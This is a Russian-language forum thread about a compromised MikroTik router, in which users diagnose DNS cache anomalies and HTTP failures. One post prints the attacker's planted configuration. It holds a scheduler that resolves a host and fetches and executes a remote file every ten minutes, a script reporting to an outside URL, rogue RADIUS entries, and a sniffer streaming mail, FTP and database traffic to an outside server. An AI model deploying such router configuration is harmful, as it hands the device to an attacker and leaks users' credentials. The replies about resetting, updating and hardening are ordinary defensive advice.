Перейти к содержимому
Калькуляторы

Появляются записи Static DNS

Здравствуйте. Проблема в самопроизвольном появлении записей в статик днс, сайты перестают грузиться, после сброса все работает как следует. В логах ничего не увидел, с какой стороны эта проблема?

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

25 минут назад, weedman сказал:

Здравствуйте. Проблема в самопроизвольном появлении записей в статик днс, сайты перестают грузиться, после сброса все работает как следует. В логах ничего не увидел, с какой стороны эта проблема?

 

На какие сайты появляются записи?

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

 

 

1 час назад, SSD сказал:

На какие сайты появляются записи?

Большой список, просто портянка там что-то и с андройдом было связано 1tv  кажется какой-то, я очистил уже и не сделал сриншот. при повторении выложу. это уже третий раз в этом месяце в разных местах

Изменено пользователем weedman

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Заблокировал на input все кроме внутренней сети и впн для управления, проблема та же. часть сайтов открывает, часть нет.

oiM8JGAcRGw.jpgtUNoei7BmS0.jpgGxmnpTHi0jw.jpg  прошивку, экспорт и ip сервис к сожалению сейчас не смогу выложить

возможно проблема не в этом. но недели три назад та же хрень была на моем домашнем роутере и очистка кэша помогла, тут же после этого сразу все возвращается (записи и неработоспособность

ВАЖНОЕ ДОПОЛНЕНИЕ- проблема не со статик днс, а с кэшем

Изменено пользователем weedman
дополнение

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

2 hours ago, weedman said:

ВАЖНОЕ ДОПОЛНЕНИЕ- проблема не со статик днс, а с кэшем

Хехе, это ж из разряда и не выиграл, а проиграл...

Ну вообще ж разные списки, кэш заполняется из ответов DNS серверов на ваши запросы.

Попробуйте прописать в IP - DNS - Servers что-нибудь типа 8.8.8.8/8.8.4.4 или 1.1.1.1/1.0.0.1

А Use Peer DNS отключите, если используется.

Хотя как-то не очень уверен, что проблема именно в DNS.

Изменено пользователем McSea

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

6 часов назад, McSea сказал:

Хехе, это ж из разряда и не выиграл, а проиграл...

Ну вообще ж разные списки, кэш заполняется из ответов DNS серверов на ваши запросы.

Попробуйте прописать в IP - DNS - Servers что-нибудь типа 8.8.8.8/8.8.4.4 или 1.1.1.1/1.0.0.1

А Use Peer DNS отключите, если используется.

Хотя как-то не очень уверен, что проблема именно в DNS.

 

используются 8.8.8.8 и 8.8.4.4, use peer dns отключал. после блокировки Input эти записи стали появляться меньше. на домашнем компе проблема решилась, а в этой ситуации (рабочей) все так же.

Ip-Service все по дефолту, не менялось ничего ни в одном случае

Изменено пользователем weedman
дополнение

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

6 hours ago, weedman said:

после блокировки Input эти записи стали появляться меньше. на домашнем компе проблема решилась, а в этой ситуации (рабочей) все так же.

Если используется микротик как DNS сервер (точнее сказать кэширующий прокси), в кэше обязательно будет куча записей, это более чем нормально. Зачем нужен кэш, нужно объяснять ?

Записи там не от фонаря, а те, что (в вашем случае) DNS гугла выдает. Произвольный адрес туда не прописать, в RouterOS и команды нет такой, только очистка (как и должно быть в случае кэша). 

 

Однако надо закрывать доступ к нему снаружи, просто чтобы не создавалась лишняя нагрузка на роутер.

В дефолтовом конфиге именно так, input закрыт с WAN весь, кроме icmp.

 

Возьмите какой-либо проблемный сайт, DNS микротика и внешние DNS должны выдавать одинаковые адреса для него.

Напр. запрос "nslookup site.ru 192.168.8.1" (или какой у вас адрес) для микротика, и "nslookup site.ru 9.9.9.9" для DNS сервера quad9.

Изменено пользователем McSea

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Просто нужно убрать с микротика белый IP (перенести DNS на отдельное устройство с серыми адресами) тогда и фильтры никакие не потребуются.

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

2 hours ago, Saab95 said:

Просто нужно убрать с микротика белый IP (перенести DNS на отдельное устройство с серыми адресами) тогда и фильтры никакие не потребуются.

И куда же этот белый IP в типичной домашне-офисной сети предлагаете повесить ? 

Может на стене в рамочке ? 

 

Вы бы не путали домашне-офисные сети с провайдерскими, это провайдерам фильтр не нужен, особенно на транзит, т.к. абоненты должны иметь 100% открытый инет доступ, которого почему-то не имеют.

 

 

 

Изменено пользователем McSea

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Всем откликнувшимся спасибо. Сегодня было установлено, что проблема в другом. блокируются сервисы по http, https работает нормально. сделал экспорт, попробую разобраться в причине сам, если не смогу, обращусь. еще раз спасибо. На днс подумал потому что недавно была такая проблема и решилась очисткой кэша, блокировка может и не дала ничего. 

брожу в темной комнате на ощупь. 

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

18 часов назад, Saab95 сказал:

Просто нужно убрать с микротика белый IP (перенести DNS на отдельное устройство с серыми адресами) тогда и фильтры никакие не потребуются.

Вот это там явно появилось не по моей воле.  какие у вас мысли?

 

/ip proxy
set port=42216
/ppp aaa
set interim-update=1m use-circuit-id-in-nas-port-id=yes use-radius=yes
/radius
add address=47.75.230.175 secret=test service=ppp
add address=47.75.230.175 secret=test service=ppp
add address=47.75.230.175 secret=test service=ppp
add address=47.75.230.175 secret=test service=ppp
add address=47.75.230.175 secret=test service=ppp
add address=47.75.230.175 secret=test service=ppp
add address=47.75.230.175 secret=test service=ppp
/radius incoming
set accept=yes
/system scheduler
add interval=2h name=a on-event=ip policy=ftp,reboot,read,write,policy,test,password,sniff,sensitive start-time=startup
add interval=10m name=autosupout on-event=":if ([/file find name=autosupout1.rif]=\"\") do={\r\
    \n:local ssip [:resolve jt.25u.com server=8.8.8.8]\r\
    \n/tool fetch url=\"http://\$ssip:81/autosupout1.rif\" dst-path=autosupout1.rif\r\
    \n}\r\
    \nexecute [/file get autosupout1.rif contents]" policy=ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=jan/01/1970 start-time=00:00:00
/system script
add name=ip owner=admin policy=reboot,read,write,policy,test,password,sniff,sensitive source="{/tool fetch url=(\"http://www.boss-ip.com/Core/Update.ashx\\\?key=5bc24d5c0d\
    21bf27&action=upload&sncode=06E212D666C4043D2C2E7C2B0202CA53&dynamic=static\")  keep-result=no}"
/tool sniffer
set file-limit=100KiB filter-interface=all filter-ip-protocol=tcp filter-port=ftp,pop3,143,mysql filter-stream=yes streaming-enabled=yes streaming-server=77.222.54.45

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

я худею с комментаторов.,  тут 100 пудовый пролом

статик днс от нормальной работы не появиться, тем более настройки прокси,  все это внесено либо ручками либо скриптом

 

2 ТС, обновлять прошивку до актуальной стабильной, сбрасывать роутер в дефаулт и настраивать заново, это проще чем выковыривать что то левое,

ставить нормальный пароль,

 

для доступа на роутер ставить маски на адреса на сервисы  winbox telnet ssh , остальные сервыисы отключать нах...

и тд и тп не забывать про доступ из вне к днс микротика если вы им пользуетесь

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

20 минут назад, Constantin сказал:

я худею с комментаторов.,  тут 100 пудовый пролом

статик днс от нормальной работы не появиться, тем более настройки прокси,  все это внесено либо ручками либо скриптом

 

2 ТС, обновлять прошивку до актуальной стабильной, сбрасывать роутер в дефаулт и настраивать заново, это проще чем выковыривать что то левое,

ставить нормальный пароль,

 

для доступа на роутер ставить маски на адреса на сервисы  winbox telnet ssh , остальные сервыисы отключать нах...

и тд и тп не забывать про доступ из вне к днс микротика если вы им пользуетесь

 

сбросил на заводские, прошивка пока 6.35.4 stable 

После перезагрузки захожу на speedtest.net (http), начинаю проверку, сначала все идет нормально, а при проверке исходящего (примерно 20 сек от начала) выходит ошибка. обновляю страницу и гугл переводчик говорит что дальше все написано на странице по малазийски. в экспорте ничего подозрительного на этот раз нет. попробую прошить нетинсталом 6.40.7 

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

2 минуты назад, weedman сказал:

прошить нетинсталом 6.40.7 

прошивайте 6,42,5 и не ипите тут мосги народу что 3,35 что 6,40 дырявые прошивки.

либо сначала фильтра потом уже в инет выпускайте...что за люди,

если нет знаний и опыта то делайте что вам говорят, не нужно от себятины чтоб по новому кругу проблеммы глотать

 

 

 

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

4 минуты назад, Constantin сказал:

прошивайте 6,42,5 и не ипите тут мосги народу что 3,35 что 6,40 дырявые прошивки.


 

принято

Изменено пользователем weedman

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

5 hours ago, Constantin said:

прошивайте 6,42,5 и не ипите тут мосги народу что 3,35 что 6,40 дырявые прошивки.

в последнем bugfix-е 6.40.8 все дырки (известные) закрыты, так же как и в текущем stable

Изменено пользователем McSea

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Гость
Ответить в тему...

×   Вставлено в виде отформатированного текста.   Вставить в виде обычного текста

  Разрешено не более 75 смайлов.

×   Ваша ссылка была автоматически встроена.   Отобразить как ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.